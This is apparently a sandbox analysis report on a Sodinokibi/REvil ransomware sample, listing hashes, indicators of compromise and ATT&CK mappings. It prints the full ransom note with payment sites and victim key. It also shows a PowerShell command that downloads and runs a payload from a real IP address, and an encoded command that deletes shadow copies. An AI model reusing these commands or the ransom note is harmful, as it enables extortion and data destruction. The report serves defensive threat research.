sodinokibi | 2b9bf7f85b20bc24437ed489cc2b0c2d4ccf0b13baa34e27568ae61d1f67a31f

General

Target

257963fd8d55fc6eb395408d6cd8eb10.bat
Size

216B
MD5

db422fe5e7b4c0a610a166c2521c5b0b
SHA1

4df900c107ef17b5d139be2fb8792908a137c1e2
SHA256

2b9bf7f85b20bc24437ed489cc2b0c2d4ccf0b13baa34e27568ae61d1f67a31f
SHA512

c19beefe11cd9b28d379f33f04061f1a75f52b017cc835997470344c27bb0274a1f555d4f89180183a5168113cd984a682e5db5e1afb5d6fd0eab3e511388f5b

Score

10^/10

ransomware persistence sodinokibi

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/257963fd8d55fc6eb395408d6cd8eb10

Extracted

Path

C:\w0vf95w-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension w0vf95w. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3738B80C8CFAFDD2 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/3738B80C8CFAFDD2 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: NFR/dZUt5LLRaE2dot2o6dvfY07bK/v+3d/XC4HYLcC2LadEA0QU4EPHmeWX2YDQ Crk6sRMBvz28+0YObdHR+K2jauS/aNa/ZI07n5Y/uPdYdwwMXuiz33doAzcdoTYN d4CCQI7LPc2TyB57z2LOp5Di/b2Fc7e20O0lgegX+cP3xIvyQOZ2motLpN0Nh5K7 7XDELiC87PbjDZSWN+7UVbZUKjNGDEDHTIXDpfFmIoZ00XVNoqCw4NyEx5CjeX+a mmQSHp2L3c5N2bsib+RQtFy01ReSEuipjM+KsLKI2CAKTs6RMPGgix2OFP8JIMej lUWDwi4hDUYLEwXVLxhWdeeW0M9q4HEy6bmlyG14ZeaP5arWfg9iv5W5xEouAnJI BMrI0F/GrHt+KiDCxj6C3udc4bkxXdUoPqy0M8OKCTaOdQlCD9E8lunrAbka6OS+ 3e/ZPM+LZpKPRB5gI/aCQGo9noflejhefOYH9GO5fBXmDmKWXXpEb3i/kudAB2YQ NBDkwTViTJnTr380aFOzB0rlq23Nqcy6QruQsSquXdP6Irh2sZr9AbCscBAF1t0s FuMSzlbIh1u2WJawDgQFrjrHtlUpcaMuu7ggP2y/ii9U68JHlaIf3bv1A1ZXXG8y DJEZGLDx399wrvrzVuYmKDYnA4gNEmnxL08X2w8t7auWhjSLeEbh51HJ2xd4RNEh Va9lmd92QU1tLkjJU29/uAS/n4/anFXXwMAYpap0kKiRj2i1RfnHmK4paGGW+zwZ CMWnC80SaEIET5KK+/q1Oru5T94A47IOb19AV2t8S000PaTZ6pF0DMlEdeFHOfEx SAXI7Me8fUkD/yFmzNsuGO7AKG28RTzW2tSrh9z/5rG+ZZE7mNjlVEDcg+rbUqj2 9cGazben9Gfndk0JGEvo43grzUkmqbvC3UueOSur0QOyPPRa9Njp6koFAptQ0YZJ iFhbo+RPjwwhF7pOdDdPMN2DqsnhWv94vE/W1olXqf3Rp2jH4vwj9Fv6N5wwGjGu 5SDuQaEulmFhlXXu5isMjEomrzTNtEYM7xdS8qMd1IPpTBA2f3n0ec10NEi549TF H7htR92DYOc7ALHEIBok9oXkBiac5am+h1Wq7c7PY6+hS/zDxAIyWFuezD9fq6by yWDKvUn+mGGmIIYWXU/ApYP6legJBjOXmDaOOP7nN4AT/E6P0VpXBHEtC/mLBTrL vNWq0nYFZsR8Wp4f0kkGOwh4azzqUx9pxk3RzHGRWV5Olu0xBo0aJg/b5chnGOuB a9afcB21+gTNiqWlhHBKt2DGexER7l7cGUVEEZ3jilrvXg== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3738B80C8CFAFDD2

http://decryptor.cc/3738B80C8CFAFDD2

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 272 powershell.exe

flow	pid	process
3	272	powershell.exe

Modifies extensions of user files 12 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\users\admin\pictures\StopGroup.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\HidePing.tiff => \??\c:\users\admin\pictures\HidePing.tiff.w0vf95w	powershell.exe
File renamed	C:\Users\Admin\Pictures\LimitInvoke.tif => \??\c:\users\admin\pictures\LimitInvoke.tif.w0vf95w	powershell.exe
File renamed	C:\Users\Admin\Pictures\EnterStop.raw => \??\c:\users\admin\pictures\EnterStop.raw.w0vf95w	powershell.exe
File renamed	C:\Users\Admin\Pictures\PublishUnblock.crw => \??\c:\users\admin\pictures\PublishUnblock.crw.w0vf95w	powershell.exe
File renamed	C:\Users\Admin\Pictures\ResetRepair.raw => \??\c:\users\admin\pictures\ResetRepair.raw.w0vf95w	powershell.exe
File renamed	C:\Users\Admin\Pictures\StopGroup.tiff => \??\c:\users\admin\pictures\StopGroup.tiff.w0vf95w	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\DisableExpand.tiff	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\HidePing.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\DisableExpand.tiff => \??\c:\users\admin\pictures\DisableExpand.tiff.w0vf95w	powershell.exe
File renamed	C:\Users\Admin\Pictures\EditRepair.png => \??\c:\users\admin\pictures\EditRepair.png.w0vf95w	powershell.exe
File renamed	C:\Users\Admin\Pictures\WatchEnter.raw => \??\c:\users\admin\pictures\WatchEnter.raw.w0vf95w	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8214dbkpdm.bmp"	powershell.exe

Drops file in Program Files directory 25 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\WatchUnblock.inf	powershell.exe
File opened for modification	\??\c:\program files\ConvertToSet.M2V	powershell.exe
File opened for modification	\??\c:\program files\EnterUse.3gp	powershell.exe
File opened for modification	\??\c:\program files\TestShow.rtf	powershell.exe
File opened for modification	\??\c:\program files\TraceComplete.css	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\w0vf95w-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\StopSwitch.i64	powershell.exe
File opened for modification	\??\c:\program files\UnpublishSubmit.ogg	powershell.exe
File created	\??\c:\program files\w0vf95w-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ConnectConvertFrom.wmf	powershell.exe
File opened for modification	\??\c:\program files\ExportImport.wma	powershell.exe
File opened for modification	\??\c:\program files\ExportTest.mpg	powershell.exe
File opened for modification	\??\c:\program files\UseSelect.ttf	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\w0vf95w-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\GroupPublish.M2V	powershell.exe
File opened for modification	\??\c:\program files\MountRestart.mpv2	powershell.exe
File opened for modification	\??\c:\program files\StepEnter.php	powershell.exe
File opened for modification	\??\c:\program files\UnlockSet.mpp	powershell.exe
File opened for modification	\??\c:\program files\RequestSearch.mpg	powershell.exe
File opened for modification	\??\c:\program files\SetJoin.avi	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\w0vf95w-readme.txt	powershell.exe
File created	\??\c:\program files (x86)\w0vf95w-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\DisconnectExit.ppt	powershell.exe
File opened for modification	\??\c:\program files\EnterInitialize.mpeg2	powershell.exe
File opened for modification	\??\c:\program files\PingEdit.ppsx	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

272 powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

272 powershell.exe
272 powershell.exe
272 powershell.exe
1888 powershell.exe
1888 powershell.exe

pid	process
272	powershell.exe

pid	process
272	powershell.exe
272	powershell.exe
272	powershell.exe
1888	powershell.exe
1888	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	272	powershell.exe
Token: SeDebugPrivilege	272	powershell.exe
Token: SeDebugPrivilege	1888	powershell.exe
Token: SeBackupPrivilege	1616	vssvc.exe
Token: SeRestorePrivilege	1616	vssvc.exe
Token: SeAuditPrivilege	1616	vssvc.exe
Token: SeTakeOwnershipPrivilege	272	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 992 wrote to memory of 272	992	cmd.exe	powershell.exe
PID 992 wrote to memory of 272	992	cmd.exe	powershell.exe
PID 992 wrote to memory of 272	992	cmd.exe	powershell.exe
PID 992 wrote to memory of 272	992	cmd.exe	powershell.exe
PID 272 wrote to memory of 1888	272	powershell.exe	powershell.exe
PID 272 wrote to memory of 1888	272	powershell.exe	powershell.exe
PID 272 wrote to memory of 1888	272	powershell.exe	powershell.exe
PID 272 wrote to memory of 1888	272	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\257963fd8d55fc6eb395408d6cd8eb10.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/257963fd8d55fc6eb395408d6cd8eb10');Invoke-CXEMWXSCI;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:272

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1888

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1616

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit
memory/272-5-0x0000000005240000-0x0000000005241000-memory.dmp

Filesize
4KB

Download
memory/272-21-0x00000000061B0000-0x00000000061B1000-memory.dmp

Filesize
4KB

Download
memory/272-22-0x0000000006340000-0x0000000006341000-memory.dmp

Filesize
4KB

Download
memory/272-14-0x00000000062B0000-0x00000000062B1000-memory.dmp

Filesize
4KB

Download
memory/272-13-0x0000000005700000-0x0000000005701000-memory.dmp

Filesize
4KB

Download
memory/272-8-0x0000000005640000-0x0000000005641000-memory.dmp

Filesize
4KB

Download
memory/272-0-0x0000000000000000-mapping.dmp

Download
memory/272-4-0x0000000002650000-0x0000000002651000-memory.dmp

Filesize
4KB

Download
memory/272-3-0x0000000004860000-0x0000000004861000-memory.dmp

Filesize
4KB

Download
memory/272-2-0x0000000000C20000-0x0000000000C21000-memory.dmp

Filesize
4KB

Download
memory/272-1-0x0000000074870000-0x0000000074F5E000-memory.dmp

Filesize
6.9MB

Download
memory/1888-23-0x0000000000000000-mapping.dmp

Download
memory/1888-25-0x0000000074870000-0x0000000074F5E000-memory.dmp

Filesize
6.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads